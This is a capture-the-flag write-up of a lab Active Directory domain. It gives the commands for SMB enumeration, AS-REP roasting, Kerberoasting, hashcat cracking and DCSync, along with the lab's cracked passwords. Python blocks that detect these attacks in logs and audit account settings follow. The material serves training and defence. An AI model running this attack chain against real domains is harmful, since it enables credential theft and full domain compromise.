Pentesting Windows Active Directory

MITRE ATT&CK Mapping

[Screenshot: MITRE ATT&CK mapping]

Enumeration

nmap 10.10.43.224 -vv -Pn

[Screenshot: nmap scan output]

nmap -sV 10.10.43.224 -vv -Pn

SMB share enumeration

smbclient -L \\\\10.10.84.141\\

We now grab all the text files from the two anonymous shares.

[Screenshot: SMB share enumeration]

smbclient \\\\10.10.84.141\\VulnNet-Business-Anonymous

ls

mget *

[Screenshot: SMB share enumeration]

smbclient \\\\10.10.84.141\\VulnNet-Enterprise-Anonymous

ls

mget *

[Screenshot: SMB share enumeration with smbmap]

smbmap -H 10.10.84.141 -u guest -p ''

Because the IPC$ share is readable, we can enumerate valid domain users via impacket's lookupsid.py.

We can check the downloaded files (usernames can be extracted from the text files, but we can also obtain them another way).

[Screenshot: user enumeration results]

We can enumerate the users' SIDs (because IPC$ is set to READ) with the impacket tool:

lookupsid.py guest@10.10.208.82

Performing AS-REP Roasting

If Kerberos pre-authentication is disabled on any of the above accounts, we can use GetNPUsers.py from impacket to send an authentication request to the KDC, which will then return an AS-REP (carrying a TGT) whose encrypted part is protected with a key derived from the user's password, so it can be cracked offline.

GetNPUsers.py -dc-ip 10.10.208.82 -usersfile /home/mic/Desktop/roasted/users.txt -no-pass vulnnet-rst.local/

[Screenshot: GetNPUsers.py output]

Kerberos pre-authentication is disabled for the user t-skid and we have the hash, so let's crack it using hashcat.

Cracking the KRB5 AS-REP hash using hashcat

[Screenshot: AS-REP hashes]

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Identified creds:

  • username: t-skid
  • password: tj072889*

Performing Kerberoasting with t-skid’s credentials

Because we now have valid credentials, we can perform Kerberoasting to retrieve a KRB5 TGS hash.

[Screenshot: Kerberoasting output and TGS hash]

Cracking the KRB5 TGS hash using hashcat

[Screenshot: TGS hashes]

Identified creds:

  • username: enterprise-core-vn
  • password: ry=ibfkfv,s6h,
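The two roasting steps above (AS-REP roasting of t-skid, then Kerberoasting of enterprise-core-vn) each leave a distinct trace in the domain controller's Security log: a successful event 4768 with PreAuthType 0, and a burst of event 4769 RC4 service-ticket requests for user accounts that carry an SPN. The Python below is an added example, not part of the original writeup, that runs that detection logic over constructed sample events; the IP addresses, the account svc-backup and the host names are hypothetical, and the dict field names follow the Windows EventData names.

```python
"""Detect AS-REP roasting (4768) and Kerberoasting (4769) over sample events."""
from collections import defaultdict

RC4_HMAC = 0x17        # etype 23; AES128 = 0x11, AES256 = 0x12
PREAUTH_NONE = 0       # 4768 PreAuthType 0: KDC answered without pre-authentication

# Constructed sample events (not real logs). Field names follow the Windows
# Security log EventData for 4768/4769; IPs and svc-backup are hypothetical.
SAMPLE_EVENTS = [
    # AS-REP issued to t-skid with no pre-auth: exactly what GetNPUsers collects
    {"event_id": 4768, "TargetUserName": "t-skid", "ServiceName": "krbtgt",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "IpAddress": "10.50.1.5",
     "Status": "0x0"},
    # Normal AES logon with encrypted-timestamp pre-auth (PreAuthType 2)
    {"event_id": 4768, "TargetUserName": "a-whitehat", "ServiceName": "krbtgt",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "IpAddress": "10.50.1.20",
     "Status": "0x0"},
    # Failed pre-auth (bad password, 0x18): no AS-REP material was handed out
    {"event_id": 4768, "TargetUserName": "a-whitehat", "ServiceName": "krbtgt",
     "PreAuthType": 2, "TicketEncryptionType": 0x17, "IpAddress": "10.50.1.20",
     "Status": "0x18"},
    # RC4 service tickets for user-account SPNs, two services from one source
    {"event_id": 4769, "TargetUserName": "t-skid@VULNNET-RST.LOCAL",
     "ServiceName": "enterprise-core-vn", "TicketEncryptionType": 0x17,
     "IpAddress": "10.50.1.5", "Status": "0x0"},
    {"event_id": 4769, "TargetUserName": "t-skid@VULNNET-RST.LOCAL",
     "ServiceName": "svc-backup", "TicketEncryptionType": 0x17,
     "IpAddress": "10.50.1.5", "Status": "0x0"},
    # AES ticket for a computer account: ordinary traffic
    {"event_id": 4769, "TargetUserName": "a-whitehat@VULNNET-RST.LOCAL",
     "ServiceName": "FILESRV01$", "TicketEncryptionType": 0x12,
     "IpAddress": "10.50.1.20", "Status": "0x0"},
    # RC4 ticket for a computer account: legacy host, not a roast target
    {"event_id": 4769, "TargetUserName": "a-whitehat@VULNNET-RST.LOCAL",
     "ServiceName": "LEGACY01$", "TicketEncryptionType": 0x17,
     "IpAddress": "10.50.1.20", "Status": "0x0"},
]


def is_roastable_service(name: str) -> bool:
    """Kerberoasting targets user objects that carry an SPN. Computer accounts
    (trailing $) have long random, rotating passwords and krbtgt is the TGT
    service itself, so neither is a useful offline-cracking target."""
    n = name.lower()
    return not n.endswith("$") and n != "krbtgt"


def asrep_roast_alerts(events):
    """Successful 4768 with PreAuthType 0: the KDC returned an AS-REP whose
    encrypted part can be cracked offline. RC4 (0x17) is the cheap case, but
    AES AS-REPs are crackable too, so every no-pre-auth success is flagged."""
    alerts = []
    for e in events:
        if e["event_id"] != 4768 or e["Status"] != "0x0":
            continue
        if e["PreAuthType"] == PREAUTH_NONE:
            alerts.append({"user": e["TargetUserName"],
                           "source": e["IpAddress"],
                           "rc4": e["TicketEncryptionType"] == RC4_HMAC})
    return alerts


def kerberoast_alerts(events, min_services=1):
    """Group successful RC4 4769s for user-account SPNs by (requester, source).
    Roasting tools request every SPN at once, so several distinct services
    from one principal is the signature; raise min_services to cut noise."""
    by_source = defaultdict(set)
    for e in events:
        if e["event_id"] != 4769 or e["Status"] != "0x0":
            continue
        if e["TicketEncryptionType"] != RC4_HMAC:
            continue
        if not is_roastable_service(e["ServiceName"]):
            continue
        by_source[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
    return [{"requester": user, "source": ip, "services": sorted(svcs)}
            for (user, ip), svcs in by_source.items()
            if len(svcs) >= min_services]


if __name__ == "__main__":
    for a in asrep_roast_alerts(SAMPLE_EVENTS):
        print("AS-REP roast candidate:", a)
    for k in kerberoast_alerts(SAMPLE_EVENTS):
        print("Kerberoast candidate:", k)
```

Both rules need the "Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations" subcategories enabled on the domain controllers. An account that legitimately has pre-authentication disabled trips the first rule on every logon, which is useful: it points straight at the setting that should be changed.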

We can log in now via evil-winrm.

[Screenshots: evil-winrm session, net user enumeration, smbmap scan, SMB share enumeration]

Credentials hardcoded in a Visual Basic script

[Screenshot: hardcoded credentials]

a-whitehat is a domain admin.

Performing a DC Sync attack to get the Administrator hash (Privilege Escalation)

With a-whitehat's credentials we can perform a DCSync attack to retrieve the Administrator hash and log in via evil-winrm.

[Screenshots: DCSync output and Administrator access]
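DCSync works by asking the DC to replicate, so on the DC it looks like replication: an event 4662 on the domain naming context whose Properties list the DS-Replication-Get-Changes control-access rights, but with a subject that is not a domain controller. The Python below is an added example, not part of the original writeup, that flags such events from constructed 4662 records; it assumes "Audit Directory Service Access" is enabled so that 4662 is logged at all, and the names WIN-DC01$, svc-aadconnect and the non-replication GUID deadbeef-... are hypothetical.

```python
"""Flag 4662 events that exercise replication rights from a non-DC subject."""
import re

# Control-access-right GUIDs that directory replication (and DCSync) uses.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Principals expected to replicate: each DC's own computer account plus any
# directory-sync service account. Constructed names for this example.
EXPECTED_REPLICATORS = frozenset({"win-dc01$", "svc-aadconnect"})

# Constructed 4662 events. 'Properties' mimics the multi-line EventData field
# that lists the access-right GUIDs exercised on the object.
SAMPLE_4662 = [
    # A DC replicating from its peer: normal
    {"SubjectUserName": "WIN-DC01$", "ObjectName": "DC=vulnnet-rst,DC=local",
     "AccessMask": "0x100",
     "Properties": "\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account pulling replication data: DCSync
    {"SubjectUserName": "a-whitehat", "ObjectName": "DC=vulnnet-rst,DC=local",
     "AccessMask": "0x100",
     "Properties": "\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary property read on a user object, placeholder GUID: benign
    {"SubjectUserName": "a-whitehat",
     "ObjectName": "CN=t-skid,CN=Users,DC=vulnnet-rst,DC=local",
     "AccessMask": "0x10",
     "Properties": "\t{deadbeef-0000-4000-8000-000000000001}"},
    # Sync service account on the allowlist: expected
    {"SubjectUserName": "svc-aadconnect", "ObjectName": "DC=vulnnet-rst,DC=local",
     "AccessMask": "0x100",
     "Properties": "\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{89e95b76-444d-4c62-991a-0facbeda640c}"},
]


def replication_rights_used(properties: str) -> list:
    """Names of the replication rights found among the GUIDs in Properties."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def dcsync_alerts(events, expected=EXPECTED_REPLICATORS):
    """One alert per 4662 that uses replication rights from a subject that is
    not on the allowlist. Strict by design: a new DC or sync account must be
    added to the list rather than silently ignored."""
    alerts = []
    for e in events:
        rights = replication_rights_used(e["Properties"])
        if not rights:
            continue
        if e["SubjectUserName"].lower() in expected:
            continue
        alerts.append({"subject": e["SubjectUserName"],
                       "object": e["ObjectName"],
                       "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_4662):
        print("Possible DCSync:", alert)
```

The allowlist is the part that needs care in a real domain: keep it to DC computer accounts and the documented sync accounts, and review who holds the replication rights on the domain object at all, since the DCSync here only worked because a-whitehat was a domain admin.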

Vulnerabilities identified

  • SMB null session: null sessions should be disabled, restricted, and monitored.
  • Kerberos pre-authentication should be enabled for all user accounts.
  • Weak account passwords: both cracked hashes fell to a plain wordlist attack.
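The second and third findings can be checked directly from user attributes rather than waiting for the attack to show up in logs: the DONT_REQ_PREAUTH bit of userAccountControl marks AS-REP roastable accounts, and a user object with a servicePrincipalName whose msDS-SupportedEncryptionTypes still allows RC4 is Kerberoastable with a cheap-to-crack ticket. The Python below is an added example, not part of the original writeup; it audits constructed account records shaped like LDAP attributes (the SPN values, svc-web, old-contractor and FILESRV01$ are hypothetical).

```python
"""Audit AD user attributes for roastable configurations."""

# userAccountControl bits (ADS_USER_FLAG_ENUM)
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits
ETYPE_RC4 = 0x4
ETYPE_AES128 = 0x8
ETYPE_AES256 = 0x10

# Constructed records; real ones would come from an LDAP query.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "t-skid", "userAccountControl": 0x400200,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "enterprise-core-vn", "userAccountControl": 0x10200,
     "servicePrincipalName": ["CIFS/filesrv01.vulnnet-rst.local"],
     "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "a-whitehat", "userAccountControl": 0x200,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "svc-web", "userAccountControl": 0x200,
     "servicePrincipalName": ["HTTP/web01.vulnnet-rst.local"],
     "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "FILESRV01$", "userAccountControl": 0x1000,
     "servicePrincipalName": ["HOST/filesrv01.vulnnet-rst.local"],
     "msDS-SupportedEncryptionTypes": 0x1c},
    {"sAMAccountName": "old-contractor", "userAccountControl": 0x400202,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": None},
]


def audit_account(acct):
    """Return (issue, fix) pairs for one account; empty list means clean."""
    findings = []
    uac = acct["userAccountControl"]
    if uac & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT):
        return findings      # machine accounts: long random rotating passwords
    if uac & ACCOUNTDISABLE:
        return findings      # the KDC issues nothing for disabled accounts
    if uac & DONT_REQ_PREAUTH:
        findings.append(("AS-REP roastable",
                         "clear 'Do not require Kerberos preauthentication'"))
    if uac & PASSWD_NOTREQD:
        findings.append(("password not required",
                         "clear PASSWD_NOTREQD and set a strong password"))
    if acct.get("servicePrincipalName"):
        # Absent attribute means the DC's default, which on most domains still
        # permits RC4, so treat None/0 the same as an explicit RC4 bit.
        etypes = acct.get("msDS-SupportedEncryptionTypes") or 0
        if etypes == 0 or etypes & ETYPE_RC4:
            findings.append(("Kerberoastable with RC4 tickets",
                             "use a gMSA, or set AES-only (0x18) and rotate to "
                             "a long random password"))
        if uac & DONT_EXPIRE_PASSWORD:
            findings.append(("service account password never expires",
                             "rotate and enforce expiry or move to a gMSA"))
    return findings


def audit(accounts):
    """Map sAMAccountName -> findings for every account with at least one."""
    report = {}
    for acct in accounts:
        findings = audit_account(acct)
        if findings:
            report[acct["sAMAccountName"]] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS).items():
        for issue, fix in findings:
            print(f"{name}: {issue} -> {fix}")
```

Run against a full user export this gives the remediation list for the first two findings above; the third (weak passwords) is a password-policy and filtering question that attributes alone cannot answer.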

Finally, you can try this yourself here:

https://tryhackme.com/room/vulnnetroasted


Digital Resident
